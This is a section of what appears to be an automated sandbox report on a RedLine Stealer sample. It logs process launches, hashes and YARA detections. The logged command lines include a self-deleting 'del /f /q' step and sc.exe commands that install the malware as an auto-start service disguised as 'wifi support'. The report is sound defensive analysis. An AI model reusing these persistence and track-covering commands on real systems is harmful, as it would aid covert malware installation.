                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:08
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\9355.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\9355.exe
                                                                                                                                                                                                          Imagebase:0x80000
                                                                                                                                                                                                          File size:537600 bytes
                                                                                                                                                                                                          MD5 hash:7FCE0E163EA7948C10B044B1EA77DAD9
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:09
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\8132.exe" & exit
                                                                                                                                                                                                          Imagebase:0xd80000
                                                                                                                                                                                                          File size:232960 bytes
                                                                                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:09
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:"C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\atingifo.exe" C:\Windows\SysWOW64\tfktmtml\
                                                                                                                                                                                                          Imagebase:0xd80000
                                                                                                                                                                                                          File size:232960 bytes
                                                                                                                                                                                                          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:09
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:10
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:10
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:timeout /t 5
                                                                                                                                                                                                          Imagebase:0xa00000
                                                                                                                                                                                                          File size:26112 bytes
                                                                                                                                                                                                          MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:13
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\9355.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\9355.exe
                                                                                                                                                                                                          Imagebase:0xc50000
                                                                                                                                                                                                          File size:537600 bytes
                                                                                                                                                                                                          MD5 hash:7FCE0E163EA7948C10B044B1EA77DAD9
                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002B.00000000.443464761.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002B.00000000.444404924.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002B.00000000.442960124.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002B.00000002.524710440.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                                          • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000002B.00000000.445129120.0000000000402000.00000040.00000001.sdmp, Author: Joe Security

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:13
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\sc.exe" create tfktmtml binPath= "C:\Windows\SysWOW64\tfktmtml\atingifo.exe /d\"C:\Users\user\AppData\Local\Temp\8A8A.exe\"" type= own start= auto DisplayName= "wifi support
                                                                                                                                                                                                          Imagebase:0x1380000
                                                                                                                                                                                                          File size:60928 bytes
                                                                                                                                                                                                          MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:14
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:16
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\sc.exe" description tfktmtml "wifi internet conection
                                                                                                                                                                                                          Imagebase:0x1380000
                                                                                                                                                                                                          File size:60928 bytes
                                                                                                                                                                                                          MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Start time:19:23:16
                                                                                                                                                                                                          Start date:31/12/2021
                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                          Imagebase:0x7ff7f20f0000
                                                                                                                                                                                                          File size:625664 bytes
                                                                                                                                                                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language

                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                          Code Analysis

                                                                                                                                                                                                          Reset < >